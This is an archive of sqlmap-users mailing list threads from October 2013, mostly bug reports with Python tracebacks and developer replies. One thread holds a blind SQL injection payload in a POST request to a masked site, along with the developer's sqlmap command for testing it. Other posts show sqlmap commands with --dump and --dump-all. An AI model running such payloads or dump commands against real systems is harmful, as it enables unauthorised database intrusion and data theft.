>   File "/usr/lib/python2.7/pickle.py", line 1370, in dump
>     Pickler(file, protocol).dump(obj)
>   File "/usr/lib/python2.7/pickle.py", line 224, in dump
>     self.save(obj)
>   File "/usr/lib/python2.7/pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "/usr/lib/python2.7/pickle.py", line 600, in save_list
>     self._batch_appends(iter(obj))
>   File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
>     save(x)
>   File "/usr/lib/python2.7/pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "/usr/lib/python2.7/pickle.py", line 600, in save_list
>     self._batch_appends(iter(obj))
>   File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
>     save(x)
>   File "/usr/lib/python2.7/pickle.py", line 286, in save
>     f(self, obj) # Call unbound method with explicit self
>   File "/usr/lib/python2.7/pickle.py", line 501, in save_unicode
>     self.memoize(obj)
>   File "/usr/lib/python2.7/pickle.py", line 247, in memoize
>     self.memo[id(obj)] = memo_len, obj
> MemoryError
>
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] post inject with blind-sql-injection

[Miroslav S. <mir...@gm...>]

Hi.

First thing that you have to be aware that web scanners like AppScan tend
to give false positives here and there.

You can check your sample by removing the "injection part" from the request
itself.

Put this into the request.txt file:



POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Cookie: CmProvid=js;
WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
CmProvid=js;
WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0;
iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0;
JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825;
mzone_loginuid=11388868; cmjsSSOCookie=
EC9...@js...; cmtokenid=
EC9...@js...; CmWebtokenid=13401541844,js
Accept-Language: en-US
Referer: http://www.xxx.com/xxx/space.php?do=hot
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Content-Length: 78

return_ajax=1&act=add_attention&targetid=10086



Run in sqlmap by issuing: python sqlmap.py -r request.txt -p return_ajax

Kind regards,
Miroslav Stampar


On Mon, Oct 21, 2013 at 5:54 PM, is2reg <is...@16...> wrote:

> **
> **
> method is post, but url have parameter
> following is data:
> **********************
> POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
> Content-Type: application/x-www-form-urlencoded; charset=utf-8
> Accept: text/html, */*; q=0.01
> X-Requested-With: XMLHttpRequest
> Cookie: CmProvid=js;
> WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
> CmProvid=js;
> WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665;
> fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0;
> iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0;
> JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825;
> mzone_loginuid=11388868;
> cmjsSSOCookie=EC9...@js...;
> cmtokenid=EC9...@js...;
> CmWebtokenid=13401541844,js
> Accept-Language: en-US
> Referer: http://www.xxx.com/xxx/space.php?do=hot
> Host: www.xxx.com
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
> Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR
> 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
> Content-Length: 78
>
>
> return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+&act=add_attention&targetid=10086
>
> *********************
>
> the result of appscan is blind-sql-inject, how can I inject this url with
> sqlmap?
> thanks.
>
> 2013-10-21
> ------------------------------
>  is2reg
> **
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Direct connection to Oracle supported?

[Yoan A. <yoa...@gm...>]

Maybe you forgot the quotes ?

python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f
--banner --dbs --users



On Mon, Oct 21, 2013 at 8:17 PM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> sqlmap supports it. Sample console output:
>
> $ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb"
> -v 5 --banner
>
>     sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 20:15:37
>
> [20:15:37] [DEBUG] cleaning up configuration parameters
> [20:15:37] [DEBUG] forcing timeout to 10 seconds
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521established
> [20:15:37] [INFO] the back-end DBMS is Oracle
> [20:15:37] [INFO] fetching banner
> [20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM
> v$version WHERE ROWNUM=1
> back-end DBMS: Oracle
> banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 -
> Prod'
> [20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed
>
> [*] shutting down at 20:15:37
>
> Could you please check that you run the latest revision from the Github
> repository and try to run it with -v 5? Strange thing with your case is
> "sqlmap was not able to fingerprint..." while there is no fingerprinting in
> sqlmap's direct mode (at least in HEAD revision).
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Oct 21, 2013 at 7:24 PM, Brian Milliron <Br...@ec...>wrote:
>
>> Using sqlmap on a recently updated Kali installation, I tried to connect
>> to an Oracle db using this command:
>> sqlmap -d Oracle://user:pass@10.10.10.10:1521/SID
>> I get the error message "[CRITICAL] sqlmap was not able to fingerprint
>> the back-end database management system.  Support for this DBMS will be
>> implemented at some point.
>>
>> The wiki on github states that Oracle is supported for direct
>> connections, so there is some confusion here.  Wireshark confirms no
>> attempt to connect to the server is made at all and the syntax of the
>> command appears correct.  Can you confirm whether sqlmap currently
>> supports direct connections to Oracle databases or if there is some
>> other problem?
>>
>>
>> --
>> Brian Milliron, CEO
>> ECR Security
>> http://www.ECRSecurity.com
>> 512-422-5408
>>
>>
>> ------------------------------------------------------------------------------
>> October Webinars: Code for Performance
>> Free Intel webinars can help you accelerate application performance.
>> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
>> from
>> the latest Intel processors and coprocessors. See abstracts and register >
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135991&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
*Yoan AGOSTINI*

Re: [sqlmap-users] Direct connection to Oracle supported?

[Miroslav S. <mir...@gm...>]

Hi.

sqlmap supports it. Sample console output:

$ python sqlmap.py -d "oracle://SYSTEM:testpass@192.168.5.27:1521/testdb"
-v 5 --banner

    sqlmap/1.0-dev-8dac47f - automatic SQL injection and database takeover
tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 20:15:37

[20:15:37] [DEBUG] cleaning up configuration parameters
[20:15:37] [DEBUG] forcing timeout to 10 seconds
[20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 established
[20:15:37] [INFO] the back-end DBMS is Oracle
[20:15:37] [INFO] fetching banner
[20:15:37] [PAYLOAD] SELECT NVL(CAST(banner AS VARCHAR(4000)),' ') FROM
v$version WHERE ROWNUM=1
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 -
Prod'
[20:15:37] [INFO] connection to oracle server 192.168.5.27:1521 closed

[*] shutting down at 20:15:37

Could you please check that you run the latest revision from the Github
repository and try to run it with -v 5? Strange thing with your case is
"sqlmap was not able to fingerprint..." while there is no fingerprinting in
sqlmap's direct mode (at least in HEAD revision).

Kind regards,
Miroslav Stampar


On Mon, Oct 21, 2013 at 7:24 PM, Brian Milliron <Br...@ec...>wrote:

> Using sqlmap on a recently updated Kali installation, I tried to connect
> to an Oracle db using this command:
> sqlmap -d Oracle://user:pass@10.10.10.10:1521/SID
> I get the error message "[CRITICAL] sqlmap was not able to fingerprint
> the back-end database management system.  Support for this DBMS will be
> implemented at some point.
>
> The wiki on github states that Oracle is supported for direct
> connections, so there is some confusion here.  Wireshark confirms no
> attempt to connect to the server is made at all and the syntax of the
> command appears correct.  Can you confirm whether sqlmap currently
> supports direct connections to Oracle databases or if there is some
> other problem?
>
>
> --
> Brian Milliron, CEO
> ECR Security
> http://www.ECRSecurity.com
> 512-422-5408
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] x-mac-turkish error report

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report. It should be fixed now [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/8dac47f7e5d0b940c77ef77ef43713d24309ea91


On Mon, Oct 21, 2013 at 7:20 PM, warezhacking <war...@gm...>wrote:

> I've got an error on my computer(windows)
>
> Windows 7 Professional 64-bit
>
> [19:17:28] [WARNING] unknown web page charset 'x-mac-turkish'. Please
> report by e-mail to sql...@li....
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Direct connection to Oracle supported?

[Brian M. <Br...@EC...>]

Using sqlmap on a recently updated Kali installation, I tried to connect
to an Oracle db using this command:
sqlmap -d Oracle://user:pass@10.10.10.10:1521/SID
I get the error message "[CRITICAL] sqlmap was not able to fingerprint
the back-end database management system.  Support for this DBMS will be
implemented at some point.

The wiki on github states that Oracle is supported for direct
connections, so there is some confusion here.  Wireshark confirms no
attempt to connect to the server is made at all and the syntax of the
command appears correct.  Can you confirm whether sqlmap currently
supports direct connections to Oracle databases or if there is some
other problem?


-- 
Brian Milliron, CEO
ECR Security
http://www.ECRSecurity.com
512-422-5408

[sqlmap-users] x-mac-turkish error report

[warezhacking <war...@gm...>]

I've got an error on my computer(windows)

Windows 7 Professional 64-bit

[19:17:28] [WARNING] unknown web page charset 'x-mac-turkish'. Please
report by e-mail to sql...@li....

[sqlmap-users] post inject with blind-sql-injection

[is2reg<is...@16...>]

method is post, but url have parameter
following is data:
**********************
POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Cookie: CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; CmProvid=js; WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0; iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0; JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825; mzone_loginuid=11388868; cmjsSSOCookie=EC9...@js...; cmtokenid=EC9...@js...; CmWebtokenid=13401541844,js
Accept-Language: en-US
Referer: http://www.xxx.com/xxx/space.php?do=hot
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Content-Length: 78

return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+&act=add_attention&targetid=10086

*********************

the result of appscan is blind-sql-inject, how can I inject this url with sqlmap?
thanks.

2013-10-21



is2reg

[sqlmap-users] Bug in SQLMap

[FAZ <jus...@ya...>]

Dears, 

Fyi, .... I got the below error after executing the query on "big" table of users in my test lab. 

btw, it's on the latest version 

[16:07:17] [ERROR] thread 2: 
                                                                                                                                                     
[16:07:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2ee4b81, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-2ee4b81
Python version: 2.7.5
Operating system: posix
Command line: sqlmap.py -u **************************************** --exclude-sysdbs --dump --threads 10 --hex
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 95, in main
    start()
  File "/home/testz/sqlmap/sqlmap-dev/lib/controller/controller.py", line 582, in start
    action()
  File "/home/testz/sqlmap/sqlmap-dev/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/home/testz/sqlmap/sqlmap-dev/plugins/generic/entries.py", line 168, in dumpTable
    entries = inject.getValue(query, blind=False, time=False, dump=True)
  File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 360, in getValue
    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
  File "/home/testz/sqlmap/sqlmap-dev/lib/request/inject.py", line 312, in _goUnion
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/home/testz/sqlmap/sqlmap-dev/lib/techniques/union/use.py", line 329, in unionUse
    threadData.shared.value.extend(arrayizeValue(_[1]))
  File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 45, in extend
    self.append(_)
  File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 38, in append
    filename = self._dump(self.chunks[-1])
  File "/home/testz/sqlmap/sqlmap-dev/lib/core/bigarray.py", line 65, in _dump
    pickle.dump(value, fp)
  File "/usr/lib/python2.7/pickle.py", line 1370, in dump
    Pickler(file, protocol).dump(obj)
  File "/usr/lib/python2.7/pickle.py", line 224, in dump
    self.save(obj)
  File "/usr/lib/python2.7/pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "/usr/lib/python2.7/pickle.py", line 600, in save_list
    self._batch_appends(iter(obj))
  File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
    save(x)
  File "/usr/lib/python2.7/pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "/usr/lib/python2.7/pickle.py", line 600, in save_list
    self._batch_appends(iter(obj))
  File "/usr/lib/python2.7/pickle.py", line 615, in _batch_appends
    save(x)
  File "/usr/lib/python2.7/pickle.py", line 286, in save
    f(self, obj) # Call unbound method with explicit self
  File "/usr/lib/python2.7/pickle.py", line 501, in save_unicode
    self.memoize(obj)
  File "/usr/lib/python2.7/pickle.py", line 247, in memoize
    self.memo[id(obj)] = memo_len, obj
MemoryError

Re: [sqlmap-users] Hi sqlmap developer i want to reproduce the bug

[Miroslav S. <mir...@gm...>]

Hi.

It should be fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/546


On Tue, Oct 15, 2013 at 7:18 PM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> Sorry for the late reply. We are aware of the problem.  It's the usage of
> HTML format in large dumps. We'll try to address it in next couple of days.
>
> Kind regards,
> Miroslav Stampar
> On Oct 11, 2013 3:04 PM, "lenny ginn" <cl...@gm...> wrote:
>
>> Hi ,
>>
>> I got the bug when i try to dump a big data here :
>> i using sqlmapproject-sqlmap-0.9-3312-g369006c.zip download at
>> https://codeload.github.com/sqlmapproject/sqlmap/legacy.zip/master
>>
>>
>> sqlmap version: 1.0-dev
>> Python version: 2.7.5
>> Operating system: nt
>> Command line: C:\Python27\sqlmap\sqlmap.py -u
>> **********************************
>> ********************** --random-agent --threads=7 --text-only -v 3 --d
>> ump-format=html --dump-all
>> Technique: ERROR
>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>> Traceback (most recent call last):
>>   File "C:\Python27\sqlmap\sqlmap.py", line 95, in main
>>     start()
>>   File "C:\Python27\sqlmap\lib\controller\controller.py", line 582, in
>> start
>>     action()
>>   File "C:\Python27\sqlmap\lib\controller\action.py", line 130, in action
>>     conf.dbmsHandler.dumpAll()
>>   File "C:\Python27\sqlmap\plugins\generic\entries.py", line 364, in
>> dumpAll
>>     self.dumpTable()
>>   File "C:\Python27\sqlmap\plugins\generic\entries.py", line 323, in
>> dumpTable
>>     conf.dumper.dbTableValues(kb.data.dumpedTable)
>>   File "C:\Python27\sqlmap\lib\core\dump.py", line 507, in dbTableValues
>>     bodyNode.appendChild(rowNode)
>>   File "C:\Python27\lib\xml\dom\minidom.py", line 125, in appendChild
>>     _append_child(self, node)
>>   File "C:\Python27\lib\xml\dom\minidom.py", line 282, in _append_child
>>     childNodes.append(node)
>> MemoryError
>>
>> [*] shutting down at 12:39:23
>>
>> Thanks you , i think problem is crash on memory setting
>>
>>
>> ------------------------------------------------------------------------------
>> October Webinars: Code for Performance
>> Free Intel webinars can help you accelerate application performance.
>> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
>> from
>> the latest Intel processors and coprocessors. See abstracts and register >
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=60134071&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>


-- 
Miroslav Stampar
http://about.me/stamparm